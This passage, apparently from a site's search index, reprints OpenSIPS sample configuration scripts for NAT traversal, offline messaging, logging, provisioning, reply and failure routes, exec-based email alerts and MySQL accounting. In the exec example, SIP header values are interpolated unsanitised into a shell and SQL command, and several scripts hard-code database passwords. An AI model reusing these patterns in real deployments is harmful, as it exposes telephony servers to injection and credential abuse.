\u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which true in this config), # uncomment also the following parameter) #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # !! Nathelper modparam(\u0026#34;usrloc\u0026#34;,\u0026#34;nat_bflag\u0026#34;,6) modparam(\u0026#34;nathelper\u0026#34;,\u0026#34;sipping_bflag\u0026#34;,8) modparam(\u0026#34;nathelper\u0026#34;, \u0026#34;ping_nated_only\u0026#34;, 1) # Ping only clients behind NAT # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # !! Nathelper # Special handling for NATed clients; first, NAT test is # executed: it looks for via!=received and RFC1918 addresses # in Contact (may fail if line-folding is used); also, # the received test should, if completed, should check all # vias for rpesence of received if (nat_uac_test(\u0026#34;3\u0026#34;)) { # Allow RR-ed requests, as these may indicate that # a NAT-enabled proxy takes care of it; unless it is # a REGISTER if (is_method(\u0026#34;REGISTER\u0026#34;) || !is_present_hf(\u0026#34;Record-Route\u0026#34;)) { log(\u0026#34;LOG:Someone trying to register from private IP, rewriting\\n\u0026#34;); # This will work only for user agents that support symmetric # communication. We tested quite many of them and majority is # smart enough to be symmetric. In some phones it takes a # configuration option. With Cisco 7960, it is called # NAT_Enable=Yes, with kphone it is called \u0026#34;symmetric media\u0026#34; and # \u0026#34;symmetric signalling\u0026#34;. # Rewrite contact with source IP of signalling fix_nated_contact(); if ( is_method(\u0026#34;INVITE\u0026#34;) ) { fix_nated_sdp(\u0026#34;1\u0026#34;); # Add direction=active to SDP }; force_rport(); # Add rport parameter to topmost Via setbflag(6); # Mark as NATed # if you want sip nat pinging # setbflag(8); }; }; # subsequent messages withing a dialog should take the # path determined by record-routing if (loose_route()) { # mark routing logic in request append_hf(\u0026#34;P-hint: rr-enforced\\r\\n\u0026#34;); route(1); exit; }; # we record-route all messages -- to make sure that # subsequent messages will go through our proxy; that\u0026#39;s # particularly good if upstream and downstream entities # use different transport protocol if (!is_method(\u0026#34;REGISTER\u0026#34;)) record_route(); if (!is_myself(\u0026#34;$rd\u0026#34;)) { # mark routing logic in request append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(1); exit; }; # if the request is for other domain use UsrLoc # (in case, it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if (is_method(\u0026#34;REGISTER\u0026#34;)) { # Uncomment this if you want to use digest authentication #if (!www_authorize(\u0026#34;siphub.org\u0026#34;, \u0026#34;subscriber\u0026#34;)) { #\twww_challenge(\u0026#34;siphub.org\u0026#34;, \u0026#34;0\u0026#34;); #\treturn; #}; save(\u0026#34;location\u0026#34;); exit; }; lookup(\u0026#34;aliases\u0026#34;); if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound alias\\r\\n\u0026#34;); route(1); exit; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; append_hf(\u0026#34;P-hint: usrloc applied\\r\\n\u0026#34;); route(1); } route[1] { # !! Nathelper if ($ru=~\u0026#34;[@:](192\\.168\\.|10\\.|172\\.(1[6-9]|2[0-9]|3[0-1])\\.)\u0026#34; \u0026amp;\u0026amp; !search(\u0026#34;^Route:\u0026#34;)){ sl_send_reply(\u0026#34;479\u0026#34;, \u0026#34;We don\u0026#39;t forward to private IP addresses\u0026#34;); exit; }; # if client or server know to be behind a NAT, enable relay if (isbflagset(6)) { rtpproxy_offer(); }; # NAT processing of replies; apply to all transactions (for example, # re-INVITEs from public to private UA are hard to identify as # NATed at the moment of request processing); look at replies t_on_reply(\u0026#34;1\u0026#34;); # send it out now; use stateful forwarding as it works reliably # even for UDP2TCP if (!t_relay()) { sl_reply_error(); }; } # !! Nathelper onreply_route[1] { # NATed transaction ? if (isbflagset(6) \u0026amp;\u0026amp; $rs =~ \u0026#34;(183)|2[0-9][0-9]\u0026#34;) { fix_nated_contact(); rtpproxy_answer(); # otherwise, is it a transaction behind a NAT and we did not # know at time of request processing ? (RFC1918 contacts) } else if (nat_uac_test(\u0026#34;1\u0026#34;)) { fix_nated_contact(); }; } ","permalink":"https://wdd.js.org/opensips/ch8/nathelper/","summary":"# # simple quick-start config script including nathelper support # This default script includes nathelper support. To make it work # you will also have to install Maxim\u0026#39;s RTP proxy. The proxy is enforced # if one of the parties is behind a NAT. # # If you have an endpoing in the public internet which is known to # support symmetric RTP (Cisco PSTN gateway or voicemail, for example), # then you don\u0026#39;t have to force RTP proxy.","title":"nathelper"},{"content":"# # MSILO usage example # # $ID: daniel $ # children=2 check_via=no # (cmd. line: -v) dns=off # (cmd. line: -r) rev_dns=off # (cmd. line: -R) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;msilo.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- registrar params -- modparam(\u0026#34;registrar\u0026#34;, \u0026#34;default_expires\u0026#34;, 120) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # -- msilo params -- modparam(\u0026#34;msilo\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # -- tm params -- modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timer\u0026#34;, 10 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timer\u0026#34;, 15 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;wt_timer\u0026#34;, 10 ) route{ if ( !mf_process_maxfwd_header(\u0026#34;10\u0026#34;) ) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;To Many Hops\u0026#34;); exit; }; if (is_myself(\u0026#34;$rd\u0026#34;)) { # for testing purposes, simply okay all REGISTERs # is_method(\u0026#34;XYZ\u0026#34;) is faster than ($rm==\u0026#34;XYZ\u0026#34;) # but requires textops module if (is_method(\u0026#34;REGISTER\u0026#34;)) { save(\u0026#34;location\u0026#34;); log(\u0026#34;REGISTER received -\u0026gt; dumping messages with MSILO\\n\u0026#34;); # MSILO - dumping user\u0026#39;s offline messages if (m_dump()) { log(\u0026#34;MSILO: offline messages dumped - if they were\\n\u0026#34;); } else { log(\u0026#34;MSILO: no offline messages dumped\\n\u0026#34;); }; exit; }; # backup r-uri for m_dump() in case of delivery failure $avp(11) = $ru; # domestic SIP destinations are handled using our USRLOC DB if(!lookup(\u0026#34;location\u0026#34;)) { if (! t_newtran()) { sl_reply_error(); exit; }; # we do not care about anything else but MESSAGEs if (!is_method(\u0026#34;MESSAGE\u0026#34;)) { if (!t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not found\u0026#34;)) { sl_reply_error(); }; exit; }; log(\u0026#34;MESSAGE received -\u0026gt; storing using MSILO\\n\u0026#34;); # MSILO - storing as offline message if (m_store(\u0026#34;$ru\u0026#34;)) { log(\u0026#34;MSILO: offline message stored\\n\u0026#34;); if (!t_reply(\u0026#34;202\u0026#34;, \u0026#34;Accepted\u0026#34;)) { sl_reply_error(); }; }else{ log(\u0026#34;MSILO: offline message NOT stored\\n\u0026#34;); if (!t_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;)) { sl_reply_error(); }; }; exit; }; # if the downstream UA does not support MESSAGE requests # go to failure_route[1] t_on_failure(\u0026#34;1\u0026#34;); t_relay(); exit; }; # forward anything else t_relay(); } failure_route[1] { # forwarding failed -- check if the request was a MESSAGE if (!is_method(\u0026#34;MESSAGE\u0026#34;)) exit; log(1,\u0026#34;MSILO: the downstream UA does not support MESSAGE requests ...\\n\u0026#34;); # we have changed the R-URI with the contact address -- ignore it now if (m_store(\u0026#34;$avp(11)\u0026#34;)) { log(\u0026#34;MSILO: offline message stored\\n\u0026#34;); t_reply(\u0026#34;202\u0026#34;, \u0026#34;Accepted\u0026#34;); }else{ log(\u0026#34;MSILO: offline message NOT stored\\n\u0026#34;); t_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/msilo/","summary":"# # MSILO usage example # # $ID: daniel $ # children=2 check_via=no # (cmd. line: -v) dns=off # (cmd. line: -r) rev_dns=off # (cmd. line: -R) # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;msilo.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- registrar params -- modparam(\u0026#34;registrar\u0026#34;, \u0026#34;default_expires\u0026#34;, 120) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # -- msilo params -- modparam(\u0026#34;msilo\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # -- tm params -- modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timer\u0026#34;, 10 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timer\u0026#34;, 15 ) modparam(\u0026#34;tm\u0026#34;, \u0026#34;wt_timer\u0026#34;, 10 ) route{ if ( !","title":"msilo"},{"content":"# # logging example # # ------------------ module loading ---------------------------------- port=5060 log_stderror=yes log_level=3 # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if (is_method(\u0026#34;REGISTER\u0026#34;)) { log(1, \u0026#34;REGISTER received\\n\u0026#34;); } else { log(1, \u0026#34;non-REGISTER received\\n\u0026#34;); }; if ($ru=~\u0026#34;sip:.*[@:]siphub.net\u0026#34;) { xlog(\u0026#34;request for siphub.net received\\n\u0026#34;); } else { xlog(\u0026#34;request for other domain [$rd] received\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/logging/","summary":"# # logging example # # ------------------ module loading ---------------------------------- port=5060 log_stderror=yes log_level=3 # ------------------------- request routing logic ------------------- # main routing logic route{ # for testing purposes, simply okay all REGISTERs if (is_method(\u0026#34;REGISTER\u0026#34;)) { log(1, \u0026#34;REGISTER received\\n\u0026#34;); } else { log(1, \u0026#34;non-REGISTER received\\n\u0026#34;); }; if ($ru=~\u0026#34;sip:.*[@:]siphub.net\u0026#34;) { xlog(\u0026#34;request for siphub.net received\\n\u0026#34;); } else { xlog(\u0026#34;request for other domain [$rd] received\\n\u0026#34;); }; } ","title":"loggin"},{"content":"# # $Id$ # # this example shows use of opensips\u0026#39;s provisioning interface # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8888) loadmodule \u0026#34;mi_http.so\u0026#34; loadmodule \u0026#34;pi_http.so\u0026#34; modparam(\u0026#34;pi_http\u0026#34;, \u0026#34;framework\u0026#34;, \u0026#34;/usr/local/src/opensips/examples/pi_framework.xml\u0026#34;) loadmodule \u0026#34;mi_xmlrpc_ng.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ exit; } ","permalink":"https://wdd.js.org/opensips/ch8/httpd/","summary":"# # $Id$ # # this example shows use of opensips\u0026#39;s provisioning interface # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib64/opensips/modules/\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8888) loadmodule \u0026#34;mi_http.so\u0026#34; loadmodule \u0026#34;pi_http.so\u0026#34; modparam(\u0026#34;pi_http\u0026#34;, \u0026#34;framework\u0026#34;, \u0026#34;/usr/local/src/opensips/examples/pi_framework.xml\u0026#34;) loadmodule \u0026#34;mi_xmlrpc_ng.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ exit; } ","title":"httpd"},{"content":"# # simple quick-start config script # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) children=4 port=5060 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # mysql.so must be loaded ! #loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which true in this config), # uncomment also the following parameter) # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ setflag(1); t_on_failure(\u0026#34;1\u0026#34;); t_on_reply(\u0026#34;1\u0026#34;); log(1, \u0026#34;message received\\n\u0026#34;); t_relay(\u0026#34;udp:opensips.org:5060\u0026#34;); } onreply_route[1] { if (isflagset(1)) { log(1, \u0026#34;onreply: flag set\\n\u0026#34;); } else { log(1, \u0026#34;onreply: flag unset\\n\u0026#34;); }; } failure_route[1] { if (isflagset(1)) { log(1, \u0026#34;failure: flag set\\n\u0026#34;); } else { log(1, \u0026#34;failure: flag unset\\n\u0026#34;); }; } ","permalink":"https://wdd.js.org/opensips/ch8/flag-reply/","summary":"# # simple quick-start config script # # ----------- global configuration parameters ------------------------ log_level=3 # logging level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) children=4 port=5060 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database #loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.","title":"flag_reply"},{"content":"# # $Id$ # # simple quick-start config script # # ----------- global configuration parameters ------------------------ #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;exec.so\u0026#34; # ----------------- setting module-specific parameters --------------- route{ # uri for my domain ? if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { save(\u0026#34;location\u0026#34;); return; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { # proceed to email notification if ($rm==\u0026#34;INVITE\u0026#34;) route(1) else sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; # user found, forward to his current uri now if (!t_relay()) { sl_reply_error(); }; } /* handling of missed calls */ route[1] { # don\u0026#39;t continue if it is a retransmission if ( !t_newtran()) { sl_reply_error(); exit; }; # external script: lookup user, if user exists, send # an email notification to him if (!exec_msg(\u0026#39; QUERY=\u0026#34;select email_address from subscriber where user=\\\u0026#34;$$SIP_OUSER\\\u0026#34;\u0026#34;; EMAIL=`mysql -Bsuser -pheslo -e \u0026#34;$$QUERY\u0026#34; ser`; if [ -z \u0026#34;$$EMAIL\u0026#34; ] ; then exit 1; fi ; echo \u0026#34;SIP request received from $$SIP_HF_FROM for $$SIP_OUSER\u0026#34; | mail -s \u0026#34;request for you\u0026#34; $$EMAIL \u0026#39;)) { # exec returned error ... user does not exist # send a stateful reply t_reply(\u0026#34;404\u0026#34;, \u0026#34;User does not exist\u0026#34;); } else { t_reply(\u0026#34;600\u0026#34;, \u0026#34;No messages for this user\u0026#34;); }; exit; } ","permalink":"https://wdd.js.org/opensips/ch8/exec/","summary":"# # $Id$ # # simple quick-start config script # # ----------- global configuration parameters ------------------------ #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;exec.so\u0026#34; # ----------------- setting module-specific parameters --------------- route{ # uri for my domain ? if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { save(\u0026#34;location\u0026#34;); return; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { # proceed to email notification if ($rm==\u0026#34;INVITE\u0026#34;) route(1) else sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; # user found, forward to his current uri now if (!","title":"exec"},{"content":"# # $Id$ # # example: accounting calls to nummerical destinations # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- acc params -- # set the reporting log level modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # number of flag, which will be used for accounting; if a message is # labeled with this flag, its completion status will be reported modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { log(\u0026#34;LOG: Too many hops\\n\u0026#34;); sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # Process record-routing if (loose_route()) { # label BYEs for accounting if (is_method(\u0026#34;BYE\u0026#34;)) setflag(1); t_relay(); exit; }; # labeled all transaction for accounting setflag(1); # record-route INVITES to make sure BYEs will visit our server too if (is_method(\u0026#34;INVITE\u0026#34;)) record_route(); # forward the request statefuly now; (we need *stateful* forwarding, # because the stateful mode correlates requests with replies and # drops retranmissions; otherwise, we would have to report on # every single message received) if (!t_relay()) { sl_reply_error(); exit; }; } ","permalink":"https://wdd.js.org/opensips/ch8/acc/","summary":"# # $Id$ # # example: accounting calls to nummerical destinations # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- acc params -- # set the reporting log level modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # number of flag, which will be used for accounting; if a message is # labeled with this flag, its completion status will be reported modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!","title":"acc"},{"content":"# # Sample config for MySQL accouting with OpenSIPS # # - db_mysql module must be compiled and installed # # - new columns have to be added since by default only few are recorded # - here are full SQL statements to create acc and missed_calls tables # # CREATE TABLE `acc` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # CREATE TABLE `missed_calls` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # # ----------- global configuration parameters ------------------------ log_level=3 # debug level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) port=5060 children=4 # # uncomment the following lines for TLS support #disable_tls = 0 #listen = tls:your_IP:5061 #tls_verify_server = 1 #tls_verify_client = 1 #tls_require_client_certificate = 0 #tls_method = TLSv1 #tls_certificate = \u0026#34;/usr/local/etc/opensips/tls/user/user-cert.pem\u0026#34; #tls_private_key = \u0026#34;/usr/local/etc/opensips/tls/user/user-privkey.pem\u0026#34; #tls_ca_list = \u0026#34;/usr/local/etc/opensips/tls/user/user-calist.pem\u0026#34; # ------------------ module loading ---------------------------------- # set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database # - MySQL loaded for accounting as well loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # db_mysql.so must be loaded ! #loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which true in this config), # uncomment also the following parameter) # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # flag to record to db modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_flag\u0026#34;, 1) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_missed_flag\u0026#34;, 2) # flag to log to syslog modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_missed_flag\u0026#34;, 2) # use extra accounting to record caller and callee username/domain # - take them from From URI and R-URI modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_extra\u0026#34;, \u0026#34;src_user=$fU;src_domain=$fd;dst_user=$rU;dst_domain=$rd\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_extra\u0026#34;, \u0026#34;src_user=$fU;src_domain=$fd;dst_user=$rU;dst_domain=$rd\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; # subsequent messages withing a dialog should take the # path determined by record-routing if (loose_route()) { # mark routing logic in request append_hf(\u0026#34;P-hint: rr-enforced\\r\\n\u0026#34;); if(is_method(\u0026#34;BYE\u0026#34;)) { # account BYE for STOP record setflag(1); } route(1); }; # we record-route all messages -- to make sure that # subsequent messages will go through our proxy; that\u0026#39;s # particularly good if upstream and downstream entities # use different transport protocol if (!is_method(\u0026#34;REGISTER\u0026#34;)) record_route(); # account all calls if(is_method(\u0026#34;INVITE\u0026#34;)) { # set accounting on for INVITE (success or missed call) setflag(1); setflag(2); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { # mark routing logic in request append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); # if you have some interdomain connections via TLS #if($ru=~\u0026#34;@tls_domain1.net\u0026#34;) { #\tt_relay(\u0026#34;tls:domain1.net\u0026#34;); #\texit; #} else if($ru=~\u0026#34;@tls_domain2.net\u0026#34;) { #\tt_relay(\u0026#34;tls:domain2.net\u0026#34;); #\texit; #} route(1); }; # if the request is for other domain use UsrLoc # (in case, it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if (is_method(\u0026#34;REGISTER\u0026#34;)) { # Uncomment this if you want to use digest authentication #if (!www_authorize(\u0026#34;opensips.org\u0026#34;, \u0026#34;subscriber\u0026#34;)) { #\twww_challenge(\u0026#34;opensips.org\u0026#34;, \u0026#34;0\u0026#34;); #\texit; #}; save(\u0026#34;location\u0026#34;); exit; }; if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound alias\\r\\n\u0026#34;); route(1); }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; append_hf(\u0026#34;P-hint: usrloc 